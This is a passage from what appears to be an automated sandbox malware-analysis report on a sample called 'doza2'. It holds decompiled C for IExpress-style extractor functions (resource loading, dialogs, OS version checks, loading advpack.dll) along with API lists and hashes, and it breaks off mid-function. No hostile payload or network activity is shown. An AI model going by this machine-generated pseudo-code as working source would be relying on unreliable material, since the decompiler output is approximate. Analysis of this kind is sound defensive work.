LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,004051CA,00000004,00000024,00402F71,?,00000002,00000000), ref: 004062CD
LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,004051CA,00000004,00000024,00402F71,?,00000002,00000000), ref: 004062D4
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,004051CA,00000004,00000024,00402F71,?,00000002,00000000), ref: 0040631B
FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00406345
FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,004051CA,00000004,00000024,00402F71,?,00000002,00000000), ref: 00406357

Strings

UPDFILE%lu, xrefs: 004062B3, 00406329

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Resource$Free$FindLoadLock_vsnprintf
String ID: UPDFILE%lu
API String ID: 2922116661-2329316264
Opcode ID: 4b8ed84f8ef8dd9f3ee80327505b0d0b280beef1f62c1a701c66735b5403776f
Instruction ID: dd4f3df3a962844db1ec0a9a12a2e8c46ac7e37050f014d08e7a5875b9a49fb5
Opcode Fuzzy Hash: 4b8ed84f8ef8dd9f3ee80327505b0d0b280beef1f62c1a701c66735b5403776f
Instruction Fuzzy Hash: C2212631A00219ABDB10AF649C459BFBB78EB44714B01413AFD02B3291DB398D228BE9

Uniqueness

Uniqueness Score: -1.00%

Function 00403A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E0040468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x408d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0040468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x408d4c, "<None>") == 0) {
							LocalFree( *0x408d4c);
							L9:
							 *0x409124 = 0;
							return 1;
						}
						_t9 = E00406517(_t19, 0x7d1, 0, E00403100, 0, 0);
						LocalFree( *0x408d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x409124 = 0x800704c7;
						L2:
						return 0;
					}
					E004044B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x408d4c);
					 *0x409124 = 0x80070714;
					goto L2;
				}
				E004044B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x409124 = E00406285();
				goto L2;
			}

0x00403a46
0x00403a57
0x00403a5d
0x00403a63
0x00403a6a
0x00403a91
0x00403a9a
0x00403ad8
0x00403b13
0x00403b19
0x00403b1b
0x00000000
0x00403b21
0x00403ae7
0x00403af4
0x00403afc
0x00000000
0x00000000
0x00403afe
0x00403a87
0x00000000
0x00403a87
0x00403aa8
0x00403ab3
0x00403ab9
0x00000000
0x00403ab9
0x00403a78
0x00403a82
0x00000000

APIs

Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00402F64,?,00000002,00000000), ref: 00403A5D
LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00403AB3

Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554

Part of subcall function 00406285: GetLastError.KERNEL32(00405BBC), ref: 00406285

lstrcmpA.KERNEL32(<None>,00000000), ref: 00403AD0
LocalFree.KERNEL32 ref: 00403B13

Part of subcall function 00406517: FindResourceA.KERNEL32(00400000,000007D6,00000005), ref: 0040652A
Part of subcall function 00406517: LoadResource.KERNEL32(00400000,00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00406538
Part of subcall function 00406517: DialogBoxIndirectParamA.USER32(00400000,00000000,00000547,004019E0,00000000), ref: 00406557
Part of subcall function 00406517: FreeResource.KERNEL32(00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00406560

LocalFree.KERNEL32(00000000,00403100,00000000,00000000), ref: 00403AF4

Strings

<None>, xrefs: 00403AC5
LICENSE, xrefs: 00403A46

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
String ID: <None>$LICENSE
API String ID: 2414642746-383193767
Opcode ID: aaab1e1078a32d10607d726acafb9d5d89a0e5ddb8b2aa24b25a32d22a887e56
Instruction ID: c2af970f7a243ccd3f2ce706e414ce787b41af5121a45e16be6e15035c564ba5
Opcode Fuzzy Hash: aaab1e1078a32d10607d726acafb9d5d89a0e5ddb8b2aa24b25a32d22a887e56
Instruction Fuzzy Hash: 2D117570301201ABD724AF329E09E1739BDDFD9715B10453FBA45F92F1DA7D88108A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004024E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004024E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x408004; // 0xee8c6708
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E0040658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00406CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}

0x004024e0
0x004024eb
0x004024f2
0x004024f7
0x00402504
0x0040250e
0x0040251d
0x0040252c
0x00402541
0x00402546
0x00402553
0x00402555
0x00402555
0x00402546
0x0040256c

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00402506
WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0040252C
_lopen.KERNEL32(?,00000040), ref: 0040253B
_llseek.KERNEL32(00000000,00000000,00000002), ref: 0040254C
_lclose.KERNEL32(00000000), ref: 00402555

Strings

wininit.ini, xrefs: 00402510

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
String ID: wininit.ini
API String ID: 3273605193-4206010578
Opcode ID: e5bfc17c874d528b85d8689bce10905d582a2a6edb60c1a6a67f41529dce9f18
Instruction ID: b90c4bb04f39e14ed539eb2b0743deceed2c1c4aa6b7f5bd2816e63d70cf6699
Opcode Fuzzy Hash: e5bfc17c874d528b85d8689bce10905d582a2a6edb60c1a6a67f41529dce9f18
Instruction Fuzzy Hash: 950192326002286BD720AF659E0CEDB7B7CDB45754F01017AFA49F31D0DA788E558AA9

Uniqueness

Uniqueness Score: -1.00%

Function 004036EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004036EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x408004; // 0xee8c6708
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x408184 = 1;
						 *0x408180 = 1;
						L13:
						 *0x409a40 = _t119;
						L14:
						__eflags =  *0x408a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00402A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00402A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x408a38 & 0x00000001;
											if(( *0x408a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("doza2");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0040681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "doza2", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E004067C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E004028E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x409a40 = _t119;
						 *0x408184 = 1;
						 *0x408180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x409a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x408184 = _t135;
							 *0x408180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E004044B9(0, _t138);
					L66:
					return E00406CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}

0x004036f9
0x00403700
0x0040370c
0x00403716
0x00403718
0x0040371b
0x00403721
0x0040372b
0x0040373d
0x00403745
0x00403746
0x00403746
0x00403749
0x004037ab
0x004037ad
0x004037ae
0x004037b3
0x004037b8
0x004037b8
0x004037bf
0x004037bf
0x004037c5
0x00000000
0x00000000
0x004037cb
0x004037cd
0x00000000
0x00000000
0x004037d5
0x004037db
0x004037e8
0x004037ea
0x004037ea
0x004037ea
0x004037f0
0x004037f6
0x00403805
0x00403817
0x0040382b
0x00403830
0x00403836
0x0040383b
0x0040383d
0x004038eb
0x004038eb
0x004038f2
0x0040390c
0x00403911
0x00403911
0x00403913
0x0040394d
0x0040394d
0x0040394f
0x004038a9
0x004038a9
0x004038b0
0x004038b2
0x004038b9
0x004038bb
0x004038c1
0x00403975
0x004038c7
0x004038de
0x004038e0
0x004038e0
0x0040397b
0x0040397d
0x004039a9
0x0040397f
0x00403982
0x0040398b
0x0040398d
0x0040398f
0x0040399f
0x004039a1
0x00403991
0x00403991
0x00403991
0x0040398f
0x004039af
0x004039b6
0x00403a0f
0x00403a0f
0x00403a11
0x00403a13
0x00403a19
0x00000000
0x004039b8
0x004039b8
0x004039ba
0x00000000
0x00000000
0x004039bc
0x004039bf
0x00000000
0x00000000
0x004039c3
0x004039c9
0x004039ce
0x004039d0
0x004039e3
0x004039e5
0x004039e6
0x004039f1
0x004039f7
0x004039fa
0x00403a01
0x00403a04
0x00000000
0x00000000
0x00403a06
0x00403a09
0x00403a09
0x00403a0b
0x00403a0b
0x00000000
0x00403a09
0x004039fc
0x00000000
0x004039fc
0x004039d3
0x004039d8
0x004039da
0x00000000
0x00000000
0x00000000
0x004039dc
0x004039b6
0x00403955
0x0040395b
0x00000000
0x00000000
0x00403961
0x00403963
0x00000000
0x00000000
0x00403969
0x00403969
0x00000000
0x00403969
0x00403915
0x00403915
0x0040391b
0x0040391f
0x00000000
0x00000000
0x0040392d
0x00403933
0x00403938
0x0040393a
0x00000000
0x00000000
0x00403940
0x00403946
0x0040394b
0x00000000
0x0040394b
0x00000000
0x004038f2
0x00403843
0x00403845
0x00000000
0x00000000
0x0040384b
0x0040384d
0x00403883
0x00403885
0x00000000
0x00000000
0x0040389a
0x0040389e
0x0040389e
0x00000000
0x00000000
0x004038a0
0x004038a0
0x004038a2
0x00000000
0x00000000
0x004038a4
0x00000000
0x004038a4
0x0040384f
0x00403851
0x00403857
0x0040386e
0x00403877
0x0040387b
0x00000000
0x00000000
0x00000000
0x00403881
0x00403859
0x0040385c
0x00403862
0x00403866
0x00000000
0x00000000
0x00403868
0x00000000
0x004038f4
0x004038f4
0x004038f5
0x004038fb
0x00403901
0x00403901
0x00000000
0x0040390a
0x0040374b
0x0040374e
0x0040375c
0x00403764
0x00403769
0x0040376e
0x00403771
0x0040379c
0x0040379f
0x00000000
0x00000000
0x004037a3
0x004037a4
0x00000000
0x004037a4
0x00403773
0x00403777
0x00403778
0x0040377f
0x00403781
0x0040378e
0x0040378e
0x00403794
0x00000000
0x00403794
0x00403783
0x00000000
0x00000000
0x00403785
0x0040378c
0x00000000
0x00000000
0x00000000
0x0040378c
0x00403750
0x00000000
0x0040372d
0x0040372d
0x0040396b
0x0040396b
0x0040396c
0x0040396e
0x0040396f
0x00403a1e
0x00403a1e
0x00403a22
0x00403a27
0x00403a3e
0x00403a3e

APIs

GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00403723
MessageBeep.USER32(00000000), ref: 004039C3
MessageBoxA.USER32(00000000,00000000,doza2,00000030), ref: 004039F1

Strings

doza2, xrefs: 004039E9, 00403A19
3, xrefs: 00403785

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Message$BeepVersion
String ID: 3$doza2
API String ID: 2519184315-2054879145
Opcode ID: 5410a1e59fb1f08b1bc7790a1bc39d6c67850e2047caedfc921ec61187b5cfd1
Instruction ID: b81105887f12e35a37dab4eacb44c34be458b82212792c55bce88564180a53cc
Opcode Fuzzy Hash: 5410a1e59fb1f08b1bc7790a1bc39d6c67850e2047caedfc921ec61187b5cfd1
Instruction Fuzzy Hash: EB91E4B1B012149BEB34DF15CD407AA7BA8AB85306F1540BBD989BB2D1D7788F81CF49

Uniqueness

Uniqueness Score: -1.00%

Function 00406517 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00406517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x409a3c; // 0x400000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E004044B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t5 =  &_a16; // 0x402ee8
					_t24 =  *_t5;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x0040651f
0x0040652a
0x00406534
0x0040656b
0x00406577
0x0040657c
0x0040657c
0x00406536
0x0040653e
0x00406542
0x00000000
0x00406544
0x00406547
0x0040654c
0x00406549
0x00406549
0x00406549
0x0040655e
0x00406560
0x00406569
0x00000000
0x00000000
0x00406569
0x00406542
0x00406587

APIs

FindResourceA.KERNEL32(00400000,000007D6,00000005), ref: 0040652A
LoadResource.KERNEL32(00400000,00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00406538
DialogBoxIndirectParamA.USER32(00400000,00000000,00000547,004019E0,00000000), ref: 00406557
FreeResource.KERNEL32(00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00406560

Strings

.@, xrefs: 0040657C

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID: .@
API String ID: 1214682469-2582305824
Opcode ID: 70f531a75461c744cc8eb9bb8e8cf065a569eee3c28a8c9a419dda183718cb88
Instruction ID: b6aca25b56715203ff799519597f98c75816ff70f42a55b2cf7247ba824ed053
Opcode Fuzzy Hash: 70f531a75461c744cc8eb9bb8e8cf065a569eee3c28a8c9a419dda183718cb88
Instruction Fuzzy Hash: DC012672100219BBCB105F69AC08DBB7A6CEB89364F01013AFE01B3290D7758C308AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00406495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x408004; // 0xee8c6708
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00401781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
				_t26 = "advpack.dll";
				E0040658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00406CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x00406495
0x00406495
0x004064a0
0x004064a7
0x004064ab
0x004064bd
0x004064c2
0x004064d3
0x004064df
0x004064e8
0x00406502
0x004064ee
0x004064f9
0x004064f9
0x00406516

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 004064DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 004064F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00406502

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 004064AC
advpack.dll, xrefs: 004064C2, 004064CD, 00406501

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
API String ID: 438848745-258089097
Opcode ID: 4eef0de7905a697cee202246d5c41a4fe9ae2168913c907484af99a2600e252b
Instruction ID: f343e68db0231e3b1b86542e237e673f83042691aa5beef6a9f0cd15a7b4c131
Opcode Fuzzy Hash: 4eef0de7905a697cee202246d5c41a4fe9ae2168913c907484af99a2600e252b
Instruction Fuzzy Hash: 0F012630A00108ABE710DB60EC49EEE7338DB54314F5001BAF586B21D0CF789E968A09

Uniqueness

Uniqueness Score: -1.00%

Function 00404169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00404169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E0040468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E0040468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E004044B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E004044B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x0040417d
0x0040418f
0x00404193
0x004041b7
0x004041d3
0x004041e6
0x00000000
0x004041e7
0x004041d5
0x004041d6
0x004041d8
0x004041d9
0x004041da
0x004041df
0x004041e1
0x00000000
0x004041e1
0x004041b9
0x004041ba
0x004041bc
0x004041bd
0x004041be
0x00000000
0x004041be
0x00000000

APIs

Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,004030B4), ref: 00404189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,004030B4), ref: 004041E7

Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554

Strings

<None>, xrefs: 004041C5
FINISHMSG, xrefs: 00404173, 004041AB

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: c03d363b405e083a574d33f40101cf6cd3cc99f86cc3b4d98ea56d3fc13fb6b2
Instruction ID: b70afbfb341dd1e48003f8e01e3fe3506c20631bb83d4641c2337169838dded0
Opcode Fuzzy Hash: c03d363b405e083a574d33f40101cf6cd3cc99f86cc3b4d98ea56d3fc13fb6b2
Instruction Fuzzy Hash: F7018BF53002147BF3252A664C9AF6B218EDBD4799F10413BBB06B52D09ABCCC1141AD

Uniqueness

Uniqueness Score: -1.00%

Function 004019E0 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004019E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
